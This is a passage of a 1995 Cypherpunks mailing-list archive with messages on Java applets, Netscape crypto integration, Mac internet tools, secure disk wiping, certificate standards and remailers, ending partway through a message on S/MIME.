To: cman@communities.com (Douglas Barnes)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <199507210112.SAA01503@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote:
>Uh, no, this is a standalone Java program (includes interpreter,
>language library, etc.)
>
>Applets are treated by a browser in the same way that a GIF is treated
>(more or less); the browser may have to grab more memory to take in
>a big one, but that memory can be reclaimed when the user moves on to
>a new page.
>
>Applets run as a thread within a multi-threaded browser, they don't
>have their own processes, etc.

Good.  Any guesses how big a basic "Hello, World" applet would be?
Maybe 10K?
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 20 Jul 95 15:54:40 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507202254.SAA11508@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Ray Arachelian <sunder@escape.com> writes:
>On Thu, 13 Jul 1995, Bill Stewart wrote:
>>
>> ["virus hackers"]
>>
>>                                              ...  What viruses have to
>> do with encryption is that encryption makes it easier to prevent viruses,
>> and Senator Grassley wants to stop that.
>
>Erm, not quite.  Stealth viruses supposedly use "encryption" to hide 
>themselves....

Perhaps he was referring to the use of (cryptographically strong) hashes
to implement integrity checking?  Or authentication of software
distribution channels?

>Still, you could write beneficial viruses, or virus like programs that 
>are beneficial in nature in some way. KOH for instance?

The problem is, it's awfully hard to come up with a case where a beneficial
virus can't be replaced with a similar program that has the same features,
but lacks the ability to copy itself.

KOH is a good example.  There are plenty of good encryption programs out
there, so what is the advantage to making it a virus?  Precious little.
On the other hand, problems crop up, like: What if there are bugs in it?
How do you "call it back" and replace it with a bugfixed version?  How
does someone know, when it shows up on their machine, that it is still
the original beneficial program, and hasn't been turned into something
malicious?

This is pretty far off the subject for Cypherpunks, though.  (I suppose
it could come with a PGP signature, the key being well-known, and that
would both answer the question of whether it'd been modified as well as
tie this back into cpunks. :)

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 20 Jul 95 16:11:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <9507202311.AA12637@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> Take it or leave it, as an analysis, but the "try writing some code" is a
> meaningless insult.
[more good comments elided]

Agreed. I concur with Tim's further comments, which I've omitted, on the
meaning of "Cypherpunks write code".  It's clear that the qualifications for
being a critic (in the constructive sense) of activity XYZ differ from the
requirements for doing XYZ, in the general case. This is the old "Oh, if
you're so smart, let's see you do it better" from elementary school. Absurd.

One of the primary sources of this dispute is, I think, the fact that c'punks
have widely divergent target markets in mind. I was rather surprised to
observe this at the last Bay Area physical meeting. Sandy moderated a
prognostication session on the future of cryptoanarchy, etc. Towards the end, 
he asked each person to offer his/her definition of "victory" in the
cryptoanarchic program. Some people were adamant that privacy would need to be
widely protected across society for them to consider the project a success.
Others essentially asserted that they'd be content with what I'll call "the
cypherpunk community" enjoying free access to privacy-preserving tools. 

The various *n*x crypto tools go a long way toward satisfying one market, yet
don't appear to help much with another market. So they constitute a "big win"
for some c'punks, while remaining largely irrelevant for others.

It would behoove c'punks on
all sides not to take umbrage at others' embracing different goals. It
would be great to hear persuasive arguments as to why "we" should adopt your
plan, but "we" are under no obligation to be convinced, or to place any
particular value on the achievement of aims we don't share with you.

The significant segregation of software developers and
software users onto different platforms makes the disunity of purpose much
more of an issue than it would be otherwise. A conscious effort must be 
exerted to ensure that tools developed for the cognoscenti ;) have a
chance to run on the machines owned by the rest of the multiverse. For my
money, this is the best feature of platform-independent languages, etc. 
Ideally, Java and such will afford me the opportunity to write code for, say,
the Macintosh, which could compete with native code, without my having to
break down and use a Mac (gag).

On a related note, this summer I've broken down and found myself developing
software in Tcl under VMS. (I'm typing this on a VAXstation 4000 VLC.) Bob
Snyder has recommended exmh here before, a highly MIME- and PGP-aware mailer
for *n*x which is apparently built with Tcl/Tk. Apart from the discussions
of possibly using Safe-Tcl for remailers, I haven't seen much talk of using
Tcl/Tk for crypto apps here. Can anyone point me in the direction of work on
this front, or towards reasons why Tcl/Tk seems like a poor choice ?  I'm
still pretty new to Tcl.

-L. Futplex McCarthy <lmccarth@cs.umass.edu>
"Want to put your secret files where no-one will ever be able to access them ?
 Try ftp://ftp.netcom.com/pub/"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 19:28:49 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Netscape the Big Win
Message-ID: <ac345ac80e0210040f4f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 7/20/95, Douglas Barnes wrote:

>I don't get what you mean when you say, "Java isn't ready for the
>home market." True, I don't think that programming languages of
>any sort are part of the "home market", but I think that Java will
>enable people like cypherpunks to write extremely portable applications
>_once_ that will be embeddable on web pages viewed by browsers like
>Netscape. I can't think of anything that is going to come closer to
>your definition of "winning" the home market. Certainly the home

I agree. This is what I meant by saying programmers would use it, to put
these capabilities into browsers that home users then get.

Maybe this is just semantic quibbling: all I meant is that Java (or
Fortran, or Perl, or whatever) will not be things the home user is ready
for.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 19:57:03 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d07ac34d444a1ac@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>Good.  Any guesses how big a basic "Hello, World" applet would be?
>Maybe 10K?

The "Hello World" program I mentioned before is 325 bytes after
compilation. The 800K memory usage was a measurement of the
interpreter and language libraries being sucked into memory, assuming
no other activity on the machine.

I have a much larger program that does various kinds of reformatting
and munging of Java programs that take up a whopping 8K compiled, its
source file is 13K.

The bytecode compiled programs seem to be much more compact than their
source code versions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:24:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210121.VAA29893@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507201631.MAA18946@clark.net>, rjc@clark.net (Ray Cromwell)
wrote:


>   The answer is: integration. While TRN is a great newsreader, and 
>Eudora's a great mail reader, etc, if I read a post in TRN or a message
>in Eudora, there is no hyperlinking. If I see a link or reference,

If you used a Mac, all you had to do is click on the URL in your mailer,
newsreader, even some text editors, and the correct helper aplication will
open the URL.

For you Mac users:
ftp://redback.cs.uwa.edu.au//Others/Quinn/Config/ICeTEe1.1.1.sit requires
InternetConfig, which is available at all the major archive sites.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8BGioZzwIn1bdtAQGEEQF+PRWtaNDSdRuJYDZfGRGATwFM4zgetK7Q
cLRAa8/r89fJvzz5yRJSZLrbm84B0yYs
=qAXZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:40:28 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210138.VAA00100@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac33dc68060210045e75@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>The News reader in Netscape 1.1N is as good as the main "separate" news
>reader, NewsWatcher, for the Macintosh, and has some added benefits. For
>example, URLs in News postings automatically show up as clickable items,
>which can be jumped to immediately. (Other News programs _could_ do this,
>and maybe some of them do, but not on the Macintosh, at this moment.)

I won't suggest that others change their favorite programs, but here are
the facts:

- -All URLs in Newswatcher can be accessed by cmd-clicking them.

- -V.A. and Y.A. Newswatcher provides transparent use of anonymous remailers
for both news and email. A feature that most cypherpunks will appreciate
and that Netscape does not provide.
<ftp://mirrors.aol.com//pub/info-mac/comm/tcp/ya-newswatcher-20b28.hqx>

- -In Macs with InternetConfig
<ftp://mirrors.aol.com//pub/info-mac/comm/tcp/internet-config-11.hqx> and
the latest ICeTEe extension
<ftp://redback.cs.uwa.edu.au//Others/Quinn/Config/InternetConfig1.1.sit>
installed, all programs that use TextEdit, such as Eudora and SimpleText,
become browsers that allow instant access to any URL mentioned in the text
just by cmd-clicking on it. Netscape doesn't even come close.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8E7ioZzwIn1bdtAQFc8gGA0tBCx3neJNN6q/0JQ9dCALSKQh/+v67z
kaXJOLIcpbNW6VWVI32nJwap+C5sdwPg
=Ms35
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:44:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210142.VAA00150@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac33f977080210043230@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>Frankly, one of the great boons of my current setup is that I can
>completely get away from Unix tools and commands, away from my Unix shell
>account at Netcom, away from the arcane commands that vary from program to
>program, away from tin and elm and emacs...my fingers are already
>forgetting the emacs commands!
>
>(Those of you like Unix, fine. I agree it is useful for many things, so I'm
>not trying to debate Unix vs. the world. Just giving my perspective, and
>apparently the perspective of the many who are adopting the Web browsers as
>their "operating environments," insulated from the underlying cruft.)

Is this the same T.C. May that used to argue vehemently that if it can't
be displayed on a VT52, it was no good? Did a space alien take over Tim?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8F3SoZzwIn1bdtAQHKegF9GZbdSEP4Q5LlQz6KdwapuCMS3v5i693V
GoyxCoWO/iEOR6M5kl7ASgkagzJgVMi8
=n2gM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Thu, 20 Jul 95 20:42:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <v02130500ac348a3c3e90@[204.176.193.13]>
MIME-Version: 1.0
Content-Type: text/plain


TCMay:
>
>Why is this important?
>
>I believe, quite strongly, that we are headed toward a situation where the
>large majority of Net/Web users are using some variant of Netscape, or
>Mosaic/MacWeb/etc. (but probably Netscape, for various reasons).
>
>Integration of crypto into Netscape is thus the Big Win.
>
>I felt this was the case as far back as last fall, but my recent
>experiences tell me this is more important than ever. Integration of PGP
>and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just
>not as important.
>
>...
>
>(I'm not saying one has to stand in line for the August IPO of Netscape
>Communications, but the overall market will favor the Web browsers,
>especially Netscape.)
>
>The relevance for Cypherpunks interested in writing code is that, in my
>carefully considered opinion, writing for Netscape and other Web browsers
>is the Big Win. Even over Windows (except Windows browsers, of course).
>
>--Tim May

I only have time to keep up with my mailing lists on the weekend, so these
may have been mentioned, but...

Didn't Netscape get the short end of a major banking alliance recently?
And wasn't Microsoft's network and security software favored by that?

Has anyone here messed about with PDAs/PICs?  The Apple Newton doesn't have
much in the way of communication, but MagicCap based boxes such as Sony's
Magic Link have an awful lot of (as yet unrealized) potential.  I see as much
promise/threat for communications security in the newer PDA/PIC devices as
in Netscape.

But then i also want Netscape to invoke Eudora for mail and Newswatcher for
news, rather than having to use the as yet unstable Netscape tools.


        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 20 Jul 95 19:54:40 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d00ac34bcc434d6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

on Thu, 20 Jul 1995 10:39:49 -0700, tcmay@sensemedia.net (Timothy C. May)
wrote:

>The News reader in Netscape 1.1N is as good as the main "separate" news
>reader, NewsWatcher, for the Macintosh, and has some added benefits. For
>example, URLs in News postings automatically show up as clickable items,
>which can be jumped to immediately. (Other News programs _could_ do this,
>and maybe some of them do, but not on the Macintosh, at this moment.)

Nit: The standard version of Newswatcher does this. Just hold down the
command key and click on the URL. In addition, using the Internet Config
extension allows you to do this in lots of other standard Mac internet apps,
including the Eudora app you're using to read your mail with right now.
Newswatcher, in it's enhanced "value added" versions, does filtering, and
even will do a one-bounce anonymous remail off the remailer of your choice.

>Big programs tend to grow because they can increase market share by adding
>capabilities, by pulling in more customers.

As someone who's developed and marketed apps for the Mac market, feature
creep  usually happens more to differentiate yourself from your competition
than for any other reason. Don't look back 'cause they might be gaining on
you. Frankly, it's more of a death spiral than anything else. You get design
by focus group and feature list. The classic example of this in the Mac
market is M$ Word, which has now became such a cow that I find myself
reccommending WordPerfect (of all things) to my consulting customers. At
least with Excel, there's still nothing much better, until the next
generation, anyway.

>And I'm not going to use half a dozen small programs, each doing slightly
>different things and having different commands, when one will do nicely.

Only when their feature sets overlap, like in word processors and
spreadsheets.  When they're fully differentiated like what happened on the
Mac TCP/IP internet app market, interface fatigue is not much of a problem.

>(I could list other pluses and minuses, a la my outline FAQ, but here's
>just one more important item: cross-compatibility. Namely, with N smaller
>programs in use, of varying versions, incompatibilities and even crashes
>can result all too often ("We have discovered that MailMuncher 2.12 does
>not work with NewsNabber 1.1."). At lest with something like Netscape, a
>certain amound of cross-operability is likely, for various reasons.)

Not as bad as it sounds. Most Mac internetware types are pretty good about
fixing cross-crashes, that is until they get too big to care, which may
happen with Netscape.  In general, Mac stuff doesn't crash nearly as much as
it used to, and not nearly as much as Window$ still does. You get more
crashes in MacTCP apps because Apple botched their initial TCP
implementation. They're fixing that with Open Transport, which I've seen and
which is pretty bulletproof so far. Finally, we're still in the chewing-gum
and-bailing-wire stage with most internet apps, and the MacTCP based apps
are no exception.

>In any case, while I respect the views Pat is expressing, about
>componentware and "small is better" approaches, the market is voting with
>its feet for apps like Netscape, which are becoming the main programs folks
>will use for communication, News reading, and Web surfing.

Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
sound like someone who's totally enamored with their "-works" app. Most
people end up using more specialized apps when they hit the wall with
something which won't get all those "general purposes" taken care of...

>So go ahead and do it! I've been waiting for many years for such things.

Soon. Very soon, Tim. There's talk on the mcip (Macintosh Crytography
Interface Project) list about version 3.0 of MacPGP which should be
completely modular, and should not require a shell-PGP session to work.
Until then, the applescript hacks seem to be holding up, though Mr. 'corn's
tribulations make a brilliant counterexample.  My signature below was done
with them...

>
>To state an obvious non-crypto use of such "modules," why do all major word
>processing and page layout apps have their own "dictionaries"? Why do I
>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>there have not been "dictionary modules," for many and sundry reasons, is
>telling.

Claris started to do this, but nobody wanted to standardize on their stuff
for obvious reasons (they're owned by Apple)...

>(Before anyone mentions it, one can on the Mac use things like
>"Thunder" instead of the local dictionaries...this is not the same as a
>module usable by all programs, but instead is a user choice to bypass the
>local dictionaries. We could quibble for hours about whether this is in
>fact a universal module or not.

Indeed, though we shouldn't. Because it is.  Anyway, you're talking apples
<heh> and oranges here. A crypto module like we're talking about would
function more as an init, er, sorry, an extension, rather than as a separate
app, though Stuffit makes a good example of something which works pretty
well as both.

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMA8WFvgyLN8bw6ZVAQE0agP9FVBNe7lPu8dsqd3tNmGAMY7ivIX0eDR4
uHcogdALmk8+p8eN/a4xpfaAu2uuNp9m/FqTbUC466XREyRI7UVqOZ5EXU8UNEDZ
ykkEaqxIWZ42SZpgHgdCaMdLeNWE8Y5T1ekhN1FjmnoU2oNOQpjH1sbqs1TDuuBo
jWaTC4slnxU=
=MnuL
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 20 Jul 95 21:07:15 PDT
To: cypherpunks@toad.com
Subject: Superwipe
Message-ID: <199507210601.BAA25559@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

   This is mostly an old post that Monty Harder sent me
concerning my
program Superwipe. I got his ok to post it to Cypherpunks so
that it
would stimulate debate on my program.

   In addition to the original problem of wiping compressed
sectors, I
have found a second problem: with cacheing software and the
now
ubiquitous several hundred k hardware ram caches, it is
about impossi-
ble to do multiple wipes on sectors. Anyone else got any
ideas?

GJ>    A number of problems have cropped up though. It will
not handle
GJ> compressed disks yet. SUPERWIPE writes all 0's or all
1's & you know
GJ> what a compressed disk driver will do with them. The
driver would

>  Since most hard drives use a form of RLL encoding at the
hardware
>level, the bits don't all go in the same places every time.
For maximum
>security, you would need to write 00h through FFh, but a
fair compromise
>would be five passes: 00,55,AA,FF, and finally the string

>               'SUPERWIPEd for your protection.',BEL,CR,LF

>(gotta get in that plug) followed by random garbage.

GJ> crush them down to a few bytes at the beginning of the
file & the rest
GJ> of the file would not be touched.
GJ>
GJ>    I have decided that I can solve that problem by
writing a random
GJ> number generator function and filling the file with non-
compressable
GJ> random numbers.

>  Nope. Won't work. Suppose FUBAR.DAT is currently
compressed at 7:16
>(DoubleSpace, Stacker, et.al. typically use 16 sectors per
cluster).
>When the request to write the random cluster, now
noncompressible, comes
>along, the driver will find =another= run of 16 contiguous
sectors to
>hold the data, and free the old one (DS has no choice about
this, but
>Stacker can split clusters into noncontiguous areas if
necessary. I
>believe it "prefers" contiguous blocks, however.  IANASU.)

>  Your best bet is to put right in your docs a warning that
compressed
>drives make reliable operation of SUPERWIPE impossible to
assure, and
>that sensitive data are best kept on uncompressed drives.


GJ>    Also, I am thinking of putting SUPERWIPE into the
public domain.
GJ> I would use the privacy functions presently in it and
also include a
GJ> few more privacy functions. If I put it into the public
domain, then
GJ> I will have to distribute source code. This could make
me more vunerable

>  Why? Distribute executables, assert your copyright, and
include a
>GNU-type freeware license or whatever your heart desires.
That would be
>the international release. If you want, put up your source
code with the
>usual export controls, separately.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 20 Jul 95 20:46:22 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <v02130506ac34c46ae1f0@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 7/20/95, Timothy C. May wrote:
>To state an obvious non-crypto use of such "modules," why do all major word
>processing and page layout apps have their own "dictionaries"? Why do I
>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>there have not been "dictionary modules," for many and sundry reasons, is
>telling. (Before anyone mentions it, one can on the Mac use things like
>"Thunder" instead of the local dictionaries...this is not the same as a
>module usable by all programs, but instead is a user choice to bypass the
>local dictionaries. We could quibble for hours about whether this is in
>fact a universal module or not.


Since the support that Thunder 7 provides (with Wordprocessing and
Wordprocessing-Like Programs that it supports) is indistinguishable from
that provided by each program's integrated SpellChecker (along with T7
providing a common set of "extra" User-Extendable Dictionaries as well as a
Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list
of incorrectly spelled words for "Replace All" so the user's personal
misspellings are automatically corrected without any interaction on his/her
part]), I think the ball is initially in the court of those who claim it is
not a universal module (admittedly only for those WPs it supports) to
explain why is does not function as one would function if it existed.

IMHO - T7 is walking and quacking like a Duck so I think calling it a
"Duck" (as a first approximation) is not an unjustified action <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 20 Jul 95 21:56:21 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: And another thing...
In-Reply-To: <199507202233.AA15359@tyrell.net>
Message-ID: <Pine.BSI.3.91.950720234916.16811B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



From the tiny marketer level,
its because it will spell the death of Ticketmaster.
We can show you where your seat is in the stadia or arena.
We can then sell you the ticket on a secure socket.
And then let you print the ticket on your own printer.

The economics of this are fantastic.

Love Always,

Carol Anne

On Thu, 20 Jul 1995, Phil Fraering asked with insight:

> Why is Java the next hot thing instead of Telescript?
> 

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ekr@eit.COM (Eric Rescorla)
Date: Fri, 21 Jul 95 01:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507210844.AA17250@eitech.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>From: Adam Shostack <adam@bwh.harvard.edu>
>> 	Actually, it also supports Kerberos (not relevant to most of
>> us), and PGP messaging.  Although a KCA would be needed before anything
>> useful came of the PGP support, at least its there.
>
>It appears that support for PGP messaging has been removed from the
>July 1995 SHTTP draft.  So it's X.500 all the way.
><URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-wts-shttp-00.txt>

Well, X.509 for now. The Eastlake-Kaufman DNS Security work
(draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
--now proposed standard, awaiting an RFC number) promise to give us
a non-X.509 certification structure for the Internet. S-HTTP explicitly
looks to this work to free us from X.500. 

Note that this only marginally improves the situation, however,
since what you really want is commercial-grade certification,
and you still can't issue RSA certificates, whatever the
format, without licensing from RSADSI. This promises to be
something of an issue in the future.

-Ekr







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: piff@world-net.sct.fr
Date: Thu, 20 Jul 95 17:16:47 PDT
To: cypherpunks@toad.com
Subject: Lotus AmiPro doc
Message-ID: <199507210017.CAA23302@world-net.sct.fr>
MIME-Version: 1.0
Content-Type: text/plain



I was recommended to you by a friend who told me that you may be able to
help me decrypt or suck the password out of a LotusAmiPro doc. 
 
Your help would be greatly appreciated.  

Please email back me as soon as you can find the time.  Thank you.
  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C.CREUTZIG@BIONIC.zerberus.de (Christopher Creutzig)
Date: Sat, 22 Jul 95 17:38:21 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US mixmaster sites
In-Reply-To: <4VHP8c1w165w@vox.xs4all.nl>
Message-ID: <zp7eedaB3Q7zZ16d@bionic02.bionic.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


Ad>     remailer@replay.com
Ad>     remailer@flame.alias.net
Ad>     remailer@utopia.hacktic.nl

mixmaster@bi-node.zerberus.de is up and running.

---
Christopher Creutzig                | c.creutzig@bionic.zerberus.de
PGP-verschlsselte Nachrichten bevorzugt -- benutzt Briefumschlge!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 21 Aug 95 01:19:48 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac5d434c030210047d03@[205.199.118.202]>
Message-ID: <mG1Dw4NQnM/L084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac5d434c030210047d03@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:
}At 8:52 PM 8/20/95, Hadmut Danisch wrote:

}>These transponders are already used for many year. They inject
}>them in pigs and cows to identify them. And some car manufacturers
}>put the into the ignition keys as theft protections.
}
}The subcutaneous animal things are only detectable at very short ranges.

}Typically, a vet (animal doctor) uses a handheld wand to pick up the
}signal. Useful for tracking pets, farm animals, etc.

Yep, and it uses a nine digit number, what convienience.

}There has so far been no known uses of this on humans, at least as a matter
}of routine. Possibly some developers have tried injecting themselves, for
}the usual reasons.

Nope, those are in the works, well biotelemetry devices are.

}Implausible. The theft detectors are not picking up specific transponders,
}just the "on" or "off" state of the things attached to clothing, books,
}CDs, etc. (I say "things" because some of them are strips inserted in
}books, some are tag-like things clamped to clothing, etc.)

They'll need to change those, kids are having too much fun attaching them
to the innocent before they leave the store..

}Again, the infrastructure is lacking. The simple detectors in stores would
}have to be upgraded to track more sophisticated transponders. The stores
}would have to cooperate, etc. Implausible.

The infrastructure is in place for the implantable short range devices all
that is needed is a reader at a credit terminal. No, I don't see this as
being implemented.

Check out the pattent office for some interesting new devices in the works.
One is has wide bandwidth outgoing channel and a low bandwidth incomming
control channel. Range on the outgoing channel is 300 yards. This is
through the skin.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 01:29:23 PDT
To: cypherpunks@toad.com
Subject: Re: Java (was Netscape: the big win) (fwd)
Message-ID: <Pine.SUN.3.91.950721032639.5753C-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Bill Stewart wrote:

> At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote:
> >Uh, no, this is a standalone Java program (includes interpreter,
> >language library, etc.)
> >
> >Applets are treated by a browser in the same way that a GIF is treated
> >(more or less); the browser may have to grab more memory to take in
> >a big one, but that memory can be reclaimed when the user moves on to
> >a new page.
> >
> >Applets run as a thread within a multi-threaded browser, they don't
> >have their own processes, etc.
> 
> Good.  Any guesses how big a basic "Hello, World" applet would be?
> Maybe 10K?
> #                                Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
 
While true certain small programs may be larger in size; the difference
will decrease as the programs grow in complexity. With the natural stong
point of true object oriented code reusing more code as the program grows
the difference may still measurably be there but will be hardly noticeable.

<IMHO> it is the future of the net  

I see this being the last step that get's coporations on the net ...  making
money in a *relativly* secure way ... good or bad is another thread which I
don't want to be a part of.


-Mike

**************************************************************************
*                                                                        * 
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 21 Jul 95 01:02:16 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: It had to happen...
Message-ID: <v02130500ac34ed849b30@[165.254.158.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 7/20/95, Douglas Barnes wrote:
>Has anyone caught this yet? From "No Such Agency" to having
>their own Web page... wow.
>
>http://www.nsa.gov:8080/

They've been on the net for years. They were dockmaster (I do not remember
the domain) and were mentioned as such in Cuckoo's Egg. The address is
probably being run by the same section as dockmaster is/was (RTM Sr's
Group).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 01:16:58 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <ac33d9e705021004c7d6@[205.199.118.202]>
Message-ID: <9507210816.AA18815@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



> With regard to SSL and Netscape not being open to outside developers,
> several leading e-mail outfits, including Qualcomm, Netscape, Frontier,
> etc., are working on an interoperable secure e-mail standard called
